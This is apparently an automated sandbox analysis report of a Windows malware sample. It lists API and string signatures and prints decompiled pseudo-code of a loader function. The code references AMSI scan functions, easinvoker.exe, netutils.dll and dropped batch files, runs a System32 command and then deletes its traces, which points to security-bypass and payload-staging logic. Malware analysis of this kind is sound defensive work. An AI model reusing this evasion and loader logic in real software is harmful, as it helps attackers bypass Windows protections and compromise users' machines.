                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Internet$AttributesHandleInetLibraryMemoryModuleOfflineOpen$AddressCloseCopyCreateCurrentDirectoryFlushFreeLoadMoveNameProcProcessReadSizeVirtual_lclose_lcreat_lwrite
                                                                                                • String ID: .exe$.url$197$5E5CDDEE$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$CopyFileA$CreateRemoteThreadEx $EtwEventWrite$EtwEventWriteEx$HotKey=$IconIndex=$Initialize$InternetCloseHandle$InternetOpenUrl$InternetOpena$InternetReadFile$KernelBase$LdrGetDllHandle$LdrLoadDll$LdrQueryProcessModuleInformation$NtAccessCheck$NtAccessCheckAndAuditAlarm$NtAllocateUuids$NtCreateFile$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenSection$NtPrivilegeCheck$NtPrivilegeObjectAuditAlarm$NtPrivilegedServiceAuditAlarm$NtQuerySecurityObject$NtSetSecurityObject$Null$OpenSession$ReportEventA$ReportEventW$ScanBuffer$ScanString$SetEncryptedFileMetadata$URL=file:"$UacInitialize$UacScan$VirtualAlloc$VirtualProtect$[InternetShortcut]$^^Nc$advapi32$http$iexpress.exe$kernel32$kernelbase$ntdll$wininet
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                [Control-flow graph of function 0218C0D9 (image not preserved); legend: Executed / Not Executed]
                                                                                                C-Code - Quality: 25%
                                                                                                			E0218C0D9(intOrPtr __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                				intOrPtr _t674;
                                                                                                				intOrPtr _t741;
                                                                                                				intOrPtr _t818;
                                                                                                				intOrPtr _t885;
                                                                                                				intOrPtr _t915;
                                                                                                				void* _t920;
                                                                                                				intOrPtr _t949;
                                                                                                				intOrPtr _t979;
                                                                                                				intOrPtr _t1009;
                                                                                                				intOrPtr _t1214;
                                                                                                				intOrPtr _t1223;
                                                                                                				intOrPtr _t1232;
                                                                                                				intOrPtr _t1241;
                                                                                                				intOrPtr _t1250;
                                                                                                				intOrPtr _t1259;
                                                                                                				intOrPtr _t1268;
                                                                                                				intOrPtr _t1277;
                                                                                                				intOrPtr _t1286;
                                                                                                				intOrPtr _t1295;
                                                                                                				intOrPtr _t1304;
                                                                                                				intOrPtr _t1313;
                                                                                                				intOrPtr _t1336;
                                                                                                				intOrPtr _t1345;
                                                                                                				intOrPtr _t1354;
                                                                                                				intOrPtr _t1363;
                                                                                                				intOrPtr _t1372;
                                                                                                				intOrPtr _t1381;
                                                                                                				intOrPtr _t1390;
                                                                                                				intOrPtr _t1435;
                                                                                                				intOrPtr _t1437;
                                                                                                				void* _t1440;
                                                                                                				intOrPtr _t1460;
                                                                                                				intOrPtr _t1462;
                                                                                                				void* _t1465;
                                                                                                				void* _t1484;
                                                                                                				void* _t1485;
                                                                                                				intOrPtr _t1489;
                                                                                                				intOrPtr _t1491;
                                                                                                				intOrPtr _t1554;
                                                                                                				long _t1588;
                                                                                                				void* _t1618;
                                                                                                				void* _t1663;
                                                                                                				void* _t1694;
                                                                                                				void* _t1710;
                                                                                                				intOrPtr _t1741;
                                                                                                				intOrPtr _t1761;
                                                                                                				intOrPtr _t1769;
                                                                                                				intOrPtr _t1777;
                                                                                                				intOrPtr _t1785;
                                                                                                				intOrPtr _t1793;
                                                                                                				intOrPtr _t1801;
                                                                                                				int _t1807;
                                                                                                				intOrPtr _t1816;
                                                                                                				intOrPtr _t1817;
                                                                                                				intOrPtr _t1818;
                                                                                                				intOrPtr _t1819;
                                                                                                				intOrPtr _t1820;
                                                                                                				intOrPtr _t1821;
                                                                                                				intOrPtr _t1823;
                                                                                                				intOrPtr _t1824;
                                                                                                				intOrPtr _t1825;
                                                                                                				intOrPtr _t1826;
                                                                                                				intOrPtr _t1827;
                                                                                                				intOrPtr _t1828;
                                                                                                				intOrPtr _t1829;
                                                                                                				intOrPtr _t1830;
                                                                                                				intOrPtr _t1831;
                                                                                                				intOrPtr _t1833;
                                                                                                				intOrPtr _t1834;
                                                                                                				intOrPtr _t1835;
                                                                                                				intOrPtr _t1836;
                                                                                                				intOrPtr _t1837;
                                                                                                				intOrPtr _t1838;
                                                                                                				intOrPtr _t1839;
                                                                                                				intOrPtr _t1840;
                                                                                                				intOrPtr _t1841;
                                                                                                				intOrPtr _t1842;
                                                                                                				intOrPtr _t1843;
                                                                                                				intOrPtr _t1844;
                                                                                                				intOrPtr _t1845;
                                                                                                				intOrPtr _t1846;
                                                                                                				intOrPtr _t1847;
                                                                                                				intOrPtr _t1848;
                                                                                                				intOrPtr _t1849;
                                                                                                				intOrPtr _t1850;
                                                                                                				intOrPtr _t1851;
                                                                                                				intOrPtr _t1852;
                                                                                                				intOrPtr _t1853;
                                                                                                				intOrPtr _t1856;
                                                                                                				intOrPtr _t1857;
                                                                                                				intOrPtr _t1858;
                                                                                                				intOrPtr _t1859;
                                                                                                				intOrPtr _t1860;
                                                                                                				intOrPtr _t1861;
                                                                                                				intOrPtr _t1862;
                                                                                                				intOrPtr _t1863;
                                                                                                				intOrPtr _t1864;
                                                                                                				intOrPtr _t1865;
                                                                                                				intOrPtr _t1866;
                                                                                                				intOrPtr _t1867;
                                                                                                				intOrPtr _t1868;
                                                                                                				intOrPtr _t1869;
                                                                                                				intOrPtr _t1870;
                                                                                                				intOrPtr _t1871;
                                                                                                				intOrPtr _t1873;
                                                                                                				intOrPtr _t1874;
                                                                                                				intOrPtr _t1875;
                                                                                                				intOrPtr _t1877;
                                                                                                				void* _t1882;
                                                                                                				void* _t1889;
                                                                                                				void* _t1894;
                                                                                                
                                                                                                				_t2314 = __fp0;
                                                                                                				_t2297 = __esi;
                                                                                                				_t2296 = __edi;
                                                                                                				_t1809 = __ebx;
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x5cc, E02174D64( *((intOrPtr*)(_t2298 - 0x5d0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x5cc)));
                                                                                                				_t1816 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x5d8, _t1816, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x5d4, E02174D64( *((intOrPtr*)(_t2298 - 0x5d8))));
                                                                                                				_pop(_t1882);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x5d4)), __ebx, _t1882, __esi);
                                                                                                				_push( *0x2194b84);
                                                                                                				_push(0x218e8d8);
                                                                                                				_push("easinvoker.exe");
                                                                                                				E02174C24();
                                                                                                				E02174A98(0x21949c8, E02174D64( *((intOrPtr*)(_t2298 - 0x5dc))));
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x5e0, E02174D64( *((intOrPtr*)(_t2298 - 0x5e4))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x5e0)));
                                                                                                				_t1817 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x5ec, _t1817, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x5e8, E02174D64( *((intOrPtr*)(_t2298 - 0x5ec))));
                                                                                                				_pop(_t1889);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x5e8)), __ebx, _t1889, __esi);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x5f0, E02174D64( *((intOrPtr*)(_t2298 - 0x5f4))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x5f0)));
                                                                                                				_t1818 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x5fc, _t1818, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x5f8, E02174D64( *((intOrPtr*)(_t2298 - 0x5fc))));
                                                                                                				_pop(_t1894);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x5f8)), _t1809, _t1894, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x600, E02174D64( *((intOrPtr*)(_t2298 - 0x604))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x600)));
                                                                                                				_t1819 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x60c, _t1819, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x608, E02174D64( *((intOrPtr*)(_t2298 - 0x60c))));
                                                                                                				_pop(_t1899);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x608)), _t1809, _t1899, _t2297);
                                                                                                				_t1900 =  *0x21949c8; // 0x0
                                                                                                				_t674 =  *0x2194b38; // 0x0
                                                                                                				E021889A4(_t674, _t1809, _t1900, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x610, E02174D64( *((intOrPtr*)(_t2298 - 0x614))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x610)));
                                                                                                				_t1820 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x61c, _t1820, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x618, E02174D64( *((intOrPtr*)(_t2298 - 0x61c))));
                                                                                                				_pop(_t1905);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x618)), _t1809, _t1905, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x620, E02174D64( *((intOrPtr*)(_t2298 - 0x624))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x620)));
                                                                                                				_t1821 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x62c, _t1821, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x628, E02174D64( *((intOrPtr*)(_t2298 - 0x62c))));
                                                                                                				_pop(_t1910);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x628)), _t1809, _t1910, _t2297);
                                                                                                				_push( *0x2194b84);
                                                                                                				_push(0x218e8d8);
                                                                                                				_push( *0x2194bd4);
                                                                                                				_push("O.bat");
                                                                                                				E02174C24();
                                                                                                				E02174A98(0x21949d0, E02174D64( *((intOrPtr*)(_t2298 - 0x630))));
                                                                                                				E0218884C(0x2190b6c, _t2298 - 0x634, 0x19a);
                                                                                                				E021748F4(0x2194ba4,  *((intOrPtr*)(_t2298 - 0x634)));
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x638, E02174D64( *((intOrPtr*)(_t2298 - 0x63c))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x638)));
                                                                                                				_t1823 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x644, _t1823, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x640, E02174D64( *((intOrPtr*)(_t2298 - 0x644))));
                                                                                                				_pop(_t1919);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x640)), _t1809, _t1919, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x648, E02174D64( *((intOrPtr*)(_t2298 - 0x64c))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x648)));
                                                                                                				_t1824 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x654, _t1824, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x650, E02174D64( *((intOrPtr*)(_t2298 - 0x654))));
                                                                                                				_pop(_t1924);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x650)), _t1809, _t1924, _t2297);
                                                                                                				_t1925 =  *0x21949d0; // 0x0
                                                                                                				_t741 =  *0x2194ba4; // 0x0
                                                                                                				E021889A4(_t741, _t1809, _t1925, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x658, E02174D64( *((intOrPtr*)(_t2298 - 0x65c))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x658)));
                                                                                                				_t1825 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x664, _t1825, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x660, E02174D64( *((intOrPtr*)(_t2298 - 0x664))));
                                                                                                				_pop(_t1930);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x660)), _t1809, _t1930, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x668, E02174D64( *((intOrPtr*)(_t2298 - 0x66c))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x668)));
                                                                                                				_t1826 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x674, _t1826, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x670, E02174D64( *((intOrPtr*)(_t2298 - 0x674))));
                                                                                                				_pop(_t1935);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x670)), _t1809, _t1935, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x678, E02174D64( *((intOrPtr*)(_t2298 - 0x67c))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x678)));
                                                                                                				_t1827 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x684, _t1827, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x680, E02174D64( *((intOrPtr*)(_t2298 - 0x684))));
                                                                                                				_pop(_t1940);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x680)), _t1809, _t1940, _t2297);
                                                                                                				_push( *0x2194b84);
                                                                                                				_push(0x218e8d8);
                                                                                                				_push("netutils.dll");
                                                                                                				E02174C24();
                                                                                                				E02174A98(0x21949cc, E02174D64( *((intOrPtr*)(_t2298 - 0x688))));
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x68c, E02174D64( *((intOrPtr*)(_t2298 - 0x690))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x68c)));
                                                                                                				_t1828 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x698, _t1828, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x694, E02174D64( *((intOrPtr*)(_t2298 - 0x698))));
                                                                                                				_pop(_t1947);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x694)), _t1809, _t1947, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x69c, E02174D64( *((intOrPtr*)(_t2298 - 0x6a0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x69c)));
                                                                                                				_t1829 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x6a8, _t1829, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x6a4, E02174D64( *((intOrPtr*)(_t2298 - 0x6a8))));
                                                                                                				_pop(_t1952);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x6a4)), _t1809, _t1952, _t2297);
                                                                                                				_t1953 =  *0x21949cc; // 0x0
                                                                                                				_t818 =  *0x2194b3c; // 0x0
                                                                                                				E021889A4(_t818, _t1809, _t1953, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x6ac, E02174D64( *((intOrPtr*)(_t2298 - 0x6b0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x6ac)));
                                                                                                				_t1830 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x6b8, _t1830, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x6b4, E02174D64( *((intOrPtr*)(_t2298 - 0x6b8))));
                                                                                                				_pop(_t1958);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x6b4)), _t1809, _t1958, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanString");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x6bc, E02174D64( *((intOrPtr*)(_t2298 - 0x6c0))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x6bc)));
                                                                                                				_t1831 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x6c8, _t1831, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x6c4, E02174D64( *((intOrPtr*)(_t2298 - 0x6c8))));
                                                                                                				_pop(_t1963);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x6c4)), _t1809, _t1963, _t2297);
                                                                                                				_push( *0x2194b84);
                                                                                                				_push(0x218e8d8);
                                                                                                				_push("KDECO.bat");
                                                                                                				E02174C24();
                                                                                                				E02174A98(0x2194bac, E02174D64( *((intOrPtr*)(_t2298 - 0x6cc))));
                                                                                                				E0218884C(0x2190ad0, _t2298 - 0x6d0, 0x9a);
                                                                                                				E021748F4(0x2194ba4,  *((intOrPtr*)(_t2298 - 0x6d0)));
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x6d4, E02174D64( *((intOrPtr*)(_t2298 - 0x6d8))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x6d4)));
                                                                                                				_t1833 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x6e0, _t1833, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x6dc, E02174D64( *((intOrPtr*)(_t2298 - 0x6e0))));
                                                                                                				_pop(_t1972);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x6dc)), _t1809, _t1972, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x6e4, E02174D64( *((intOrPtr*)(_t2298 - 0x6e8))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x6e4)));
                                                                                                				_t1834 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x6f0, _t1834, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x6ec, E02174D64( *((intOrPtr*)(_t2298 - 0x6f0))));
                                                                                                				_pop(_t1977);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x6ec)), _t1809, _t1977, _t2297);
                                                                                                				_t1978 =  *0x2194bac; // 0x0
                                                                                                				_t885 =  *0x2194ba4; // 0x0
                                                                                                				E021889A4(_t885, _t1809, _t1978, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x6f4, E02174D64( *((intOrPtr*)(_t2298 - 0x6f8))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x6f4)));
                                                                                                				_t1835 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x700, _t1835, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x6fc, E02174D64( *((intOrPtr*)(_t2298 - 0x700))));
                                                                                                				_pop(_t1983);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x6fc)), _t1809, _t1983, _t2297);
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x704, E02174D64( *((intOrPtr*)(_t2298 - 0x708))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x704)));
                                                                                                				_t1836 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x710, _t1836, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x70c, E02174D64( *((intOrPtr*)(_t2298 - 0x710))));
                                                                                                				_pop(_t1988);
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x70c)), _t1809, _t1988, _t2297);
                                                                                                				_t915 =  *0x21949d0; // 0x0
                                                                                                				E02174A98(_t2298 - 0x714, E02174D64(_t915));
                                                                                                				_t920 = E021780F8( *((intOrPtr*)(_t2298 - 0x714)));
                                                                                                				_t2300 = _t920;
                                                                                                				if(_t920 != 0) {
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98(_t2298 - 0x718, E02174D64( *((intOrPtr*)(_t2298 - 0x71c))));
                                                                                                					_push( *((intOrPtr*)(_t2298 - 0x718)));
                                                                                                					_t1875 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0(_t2298 - 0x724, _t1875, 0x218e77c);
                                                                                                					E02174A98(_t2298 - 0x720, E02174D64( *((intOrPtr*)(_t2298 - 0x724))));
                                                                                                					_pop(_t2282);
                                                                                                					E02183690( *((intOrPtr*)(_t2298 - 0x720)), _t1809, _t2282, _t2297);
                                                                                                					_t1741 =  *0x21949d0; // 0x0
                                                                                                					E02174D64(_t1741);
                                                                                                					E021737AC();
                                                                                                					E02188A30(_t2298 - 0x824, _t1809, 0, 0x218e9f8, __edi, _t2297, _t2300, __fp0);
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98(_t2298 - 0x828, E02174D64( *((intOrPtr*)(_t2298 - 0x82c))));
                                                                                                					_push( *((intOrPtr*)(_t2298 - 0x828)));
                                                                                                					_t1877 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0(_t2298 - 0x834, _t1877, 0x218e77c);
                                                                                                					E02174A98(_t2298 - 0x830, E02174D64( *((intOrPtr*)(_t2298 - 0x834))));
                                                                                                					_pop(_t2289);
                                                                                                					E02183690( *((intOrPtr*)(_t2298 - 0x830)), _t1809, _t2289, _t2297);
                                                                                                					Sleep(0x1388);
                                                                                                					_t1761 =  *0x21949c8; // 0x0
                                                                                                					E02174A98(_t2298 - 0x838, E02174D64(_t1761));
                                                                                                					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x838));
                                                                                                					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t1769 =  *0x2194b44; // 0x0
                                                                                                					E02174A98(_t2298 - 0x83c, E02174D64(_t1769));
                                                                                                					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x83c));
                                                                                                					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t1777 =  *0x2194b48; // 0x0
                                                                                                					E02174A98(_t2298 - 0x840, E02174D64(_t1777));
                                                                                                					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x840));
                                                                                                					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t1785 =  *0x2194bac; // 0x0
                                                                                                					E02174A98(_t2298 - 0x844, E02174D64(_t1785));
                                                                                                					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x844));
                                                                                                					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t1793 =  *0x21949d0; // 0x0
                                                                                                					E02174A98(_t2298 - 0x848, E02174D64(_t1793));
                                                                                                					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x848));
                                                                                                					DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t1801 =  *0x21949cc; // 0x0
                                                                                                					E02174A98(_t2298 - 0x84c, E02174D64(_t1801));
                                                                                                					_t1809 =  *((intOrPtr*)(_t2298 - 0x84c));
                                                                                                					 *((intOrPtr*)(_t2298 - 0xbc)) =  *((intOrPtr*)(_t2298 - 0x84c));
                                                                                                					_t1807 = DeleteFileA(E02174D64( *((intOrPtr*)(_t2298 - 0xbc))));
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t2307 = _t1807 + 1;
                                                                                                				}
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("ScanBuffer");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x850, E02174D64( *((intOrPtr*)(_t2298 - 0x854))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x850)));
                                                                                                				_t1837 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x85c, _t1837, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x858, E02174D64( *((intOrPtr*)(_t2298 - 0x85c))));
                                                                                                				_pop(_t1994); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x858)), _t1809, _t1994, _t2297); // executed
                                                                                                				_push(0x218e77c);
                                                                                                				_push( *0x2194bb0);
                                                                                                				_push("OpenSession");
                                                                                                				E02174C24();
                                                                                                				E02174A98(_t2298 - 0x860, E02174D64( *((intOrPtr*)(_t2298 - 0x864))));
                                                                                                				_push( *((intOrPtr*)(_t2298 - 0x860)));
                                                                                                				_t1838 =  *0x2194bb0; // 0x3e01b38
                                                                                                				E02174BB0(_t2298 - 0x86c, _t1838, 0x218e77c);
                                                                                                				E02174A98(_t2298 - 0x868, E02174D64( *((intOrPtr*)(_t2298 - 0x86c))));
                                                                                                				_pop(_t1999); // executed
                                                                                                				E02183690( *((intOrPtr*)(_t2298 - 0x868)), _t1809, _t1999, _t2297);
                                                                                                				_t949 =  *0x2194bc4; // 0x3e01b48
                                                                                                				E02174CB0(_t949, 0x218e8cc);
                                                                                                				if(_t2307 == 0) {
                                                                                                					_t1489 =  *0x2194bc0; // 0x0
                                                                                                					E02174CB0(_t1489, 0x218e8cc);
                                                                                                					if(_t2307 != 0) {
                                                                                                						_t1491 =  *0x2194bc8; // 0x0
                                                                                                						E02174CB0(_t1491, 0x218e8cc);
                                                                                                						if(_t2307 != 0) {
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("ScanBuffer");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x870, E02174D64( *((intOrPtr*)(_t2298 - 0x874))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x870)));
                                                                                                							_t1858 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x87c, _t1858, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x878, E02174D64( *((intOrPtr*)(_t2298 - 0x87c))));
                                                                                                							_pop(_t2202); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x878)), _t1809, _t2202, _t2297); // executed
                                                                                                							_push(0x218e77c);
                                                                                                							_push( *0x2194bb0);
                                                                                                							_push("OpenSession");
                                                                                                							E02174C24();
                                                                                                							E02174A98(_t2298 - 0x880, E02174D64( *((intOrPtr*)(_t2298 - 0x884))));
                                                                                                							_push( *((intOrPtr*)(_t2298 - 0x880)));
                                                                                                							_t1859 =  *0x2194bb0; // 0x3e01b38
                                                                                                							E02174BB0(_t2298 - 0x88c, _t1859, 0x218e77c);
                                                                                                							E02174A98(_t2298 - 0x888, E02174D64( *((intOrPtr*)(_t2298 - 0x88c))));
                                                                                                							_pop(_t2207); // executed
                                                                                                							E02183690( *((intOrPtr*)(_t2298 - 0x888)), _t1809, _t2207, _t2297); // executed
                                                                                                							_t1860 =  *0x2194b34; // 0x3dfa858
                                                                                                							E02174BB0(_t2298 - 0x890, _t1860, "C:\\Windows\\System32\\");
                                                                                                							WinExec(E02174D64( *((intOrPtr*)(_t2298 - 0x890))), 0); // executed
